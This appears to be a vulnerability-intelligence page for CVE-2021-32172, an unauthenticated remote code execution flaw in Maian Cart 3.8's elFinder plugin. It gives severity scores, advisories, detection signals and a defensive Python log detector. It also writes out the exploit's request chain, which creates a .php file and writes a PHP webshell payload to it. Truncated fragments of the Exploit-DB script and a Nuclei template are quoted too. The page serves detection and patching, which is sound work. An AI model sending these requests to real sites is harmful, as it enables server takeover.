CVE-2021-32172
Published: 2021-10-07
CVE-2021-32172: Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.
Priority: P1 · 89 · critical 9.8 · CVSS 3.1
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Flags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 66.43% (99.2th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| maianscriptworld | maian_cart | — | — |
Detection & IOCs (extracted from sources)
command: GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
command: cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
Detection signals:
- Detect unauthenticated GET requests to the elFinder endpoint with cmd=mkfile creating a .php file in the target=l1_Lw (root) directory — this is the first stage of the RCE exploit chain.
- Detect unauthenticated POST requests to /admin/index.php?p=ajax-ops&op=elfinder with cmd=put in the body, which writes a PHP webshell payload (URL-encoded <?php system($_GET["cmd"]) ?>) to the newly created file.
- Detect GET requests to /product-downloads/*.php — the exploit drops a webshell into this publicly accessible directory and executes it via HTTP GET with a ?cmd= parameter.
- Alert on the presence of any .php file created under the product-downloads/ directory, as this path is not intended to serve executable PHP scripts.
- The exploit uses the X-Requested-With: XMLHttpRequest header in the POST write stage; correlate unauthenticated requests bearing this header to the elfinder op endpoint as a detection signal.
- The exploit cleanup step issues a GET to /admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets[]=<hash> — monitor for unauthenticated rm commands on the elfinder endpoint as evidence of post-exploitation cleanup.
- The full exploit chain requires exactly 3 unauthenticated HTTP requests (mkfile GET → put POST → shell GET); a sequence of these three request patterns from the same source IP is a high-confidence indicator of exploitation.
Context:
- The elFinder endpoint is accessible without authentication (broken access control, CWE-862), meaning no session cookie or credential is required to trigger the exploit — authentication-based controls alone will not block this attack path.
- The webshell is written to /product-downloads/, which is a publicly web-accessible directory; WAF rules should block PHP execution in this path in addition to blocking the write operation.
- The EPSS score is 0.65463 (98.494th percentile), indicating this vulnerability is actively exploited in the wild and should be treated as high-priority for detection and patching.
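The three-request chain described above, turned into a small log detector. This is an added example written for this page; it is not the Nuclei template, the Exploit-DB script, or any vendor detection rule. It assumes web-server access logs in the common combined format, so the POST body (where cmd=put lives) is not visible: stage 2 is matched on method plus the elfinder endpoint, and confidence comes from correlating all three stages from one source IP. The log lines, IPs and hash value are constructed for the demo.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample access-log lines (combined log format). IPs are from
# documentation ranges; the file name and the rm hash are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Oct/2021:10:00:01 +0000] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=abcd.php&target=l1_Lw HTTP/1.1" 200 312 "-" "python-requests/2.25.1"
203.0.113.7 - - [07/Oct/2021:10:00:02 +0000] "POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1" 200 88 "-" "python-requests/2.25.1"
203.0.113.7 - - [07/Oct/2021:10:00:03 +0000] "GET /product-downloads/abcd.php?cmd=id HTTP/1.1" 200 41 "-" "python-requests/2.25.1"
203.0.113.7 - - [07/Oct/2021:10:00:04 +0000] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets[]=CONSTRUCTED_HASH HTTP/1.1" 200 20 "-" "python-requests/2.25.1"
198.51.100.9 - - [07/Oct/2021:10:05:00 +0000] "GET /product-downloads/catalog.pdf HTTP/1.1" 200 50213 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Oct/2021:10:05:10 +0000] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=open&target=l1_Lw HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

ELFINDER_PATH = "/admin/index.php"   # endpoint named on the page
DROP_DIR = "/product-downloads/"      # webshell drop directory named on the page
CHAIN = ("mkfile", "put", "shell")    # the three-stage sequence


def classify(line):
    """Return (ip, stage) for one log line, or None if it matches no stage."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target = m.group("ip"), m.group("method"), m.group("target")
    url = urlparse(target)
    qs = {k: v[0] for k, v in parse_qs(url.query).items()}
    path = unquote(url.path)

    if path == ELFINDER_PATH and qs.get("p") == "ajax-ops" and qs.get("op") == "elfinder":
        cmd = qs.get("cmd")
        if cmd == "mkfile" and qs.get("name", "").lower().endswith(".php"):
            return ip, "mkfile"          # stage 1: create a .php file via elFinder
        if method == "POST" and cmd is None:
            return ip, "put"             # stage 2: body not logged; POST to the op is the signal
        if cmd == "rm":
            return ip, "rm"              # cleanup: removal of the dropped file
    if path.startswith(DROP_DIR) and path.lower().endswith(".php"):
        return ip, "shell"               # stage 3: PHP executed from the download directory
    return None


def find_chains(lines):
    """Group stages per source IP and grade the evidence.

    'high'   : mkfile, put and shell seen in that order from one IP
    'medium' : a mkfile or shell hit without the full ordered chain
    """
    stages = defaultdict(list)
    for line in lines:
        hit = classify(line)
        if hit:
            stages[hit[0]].append(hit[1])

    alerts = {}
    for ip, seq in stages.items():
        idx = [seq.index(s) for s in CHAIN if s in seq]
        if len(idx) == len(CHAIN) and idx == sorted(idx):
            alerts[ip] = "high"
        elif "mkfile" in seq or "shell" in seq:
            alerts[ip] = "medium"
    return alerts


if __name__ == "__main__":
    for ip, level in find_chains(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {level}-confidence CVE-2021-32172 exploitation pattern")
```

The ordered-sequence check is what separates a real chain from an administrator legitimately using the file manager: a single unauthenticated POST to the elfinder op is only a weak signal on its own, but mkfile of a .php name followed by a request for a .php file under /product-downloads/ from the same source is the pattern the page calls high-confidence. Legitimate admin traffic (cmd=open, PDF downloads) produces no alert.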
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-p6pf-mpv2-5j87: Maian Cart v3
ghsa_unreviewed · 2022-05-24
CVE-2021-32172 [CRITICAL] CWE-862
Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.
VulnCheck
maianscriptworld maian_cart Missing Authorization
vulncheck · 2021 · CVSS 9.8
CVE-2021-32172 [CRITICAL]
Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.
Affected: maianscriptworld maian_cart
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
No detection rules found.
Exploit-DB
Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
exploitdb · 2021-10-08 · CVSS 9.8
CVE-2021-32172 [CRITICAL]
---
```python
# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 27.11.2020 19:35
# Tested on: Ubuntu 20.04 LTS
# Exploit Author(s): DreyAnd, purpl3
# Software Link: https://www.maiancart.com/download.html
# Vendor homepage: https://www.maianscriptworld.co.uk/
# Version: Maian Cart 3.8
# CVE: CVE-2021-32172
#!/usr/bin/python3
import argparse
import requests
from bs4 import BeautifulSoup
import sys
import json
import time

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", help="default=/ , starting directory of the "
                    "maian-cart instance, sometimes is placed at /cart or /maiancart")
args = parser.parse_args()
#ar
```
Nuclei
Maian Cart <=3.8 - Remote Code Execution
nuclei · CVSS 9.8
CVE-2021-32172 [CRITICAL]
Maian Cart =3.8) to mitigate this vulnerability.
```yaml
  reference:
    - https://dreyand.github.io/maian-cart-rce/
    - https://github.com/DreyAnd/maian-cart-rce
    - https://www.maianscriptworld.co.uk/critical-updates
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32172
    - https://www.maianscriptworld.co.uk/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-32172
    cwe-id: CWE-862
    epss-score: 0.65463
    epss-percentile: 0.98494
    cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: maianscriptworld
    product: maian_cart
  tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld,vkev,vuln

http:
  - raw:
      - |
        GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
        Host: {{Hostname
```
References
- http://packetstormsecurity.com/files/164445/Maian-Cart-3.8-Remote-Code-Execution.html
- https://dreyand.github.io/maian-cart-rce/
- https://github.com/DreyAnd/maian-cart-rce
- https://www.maianscriptworld.co.uk/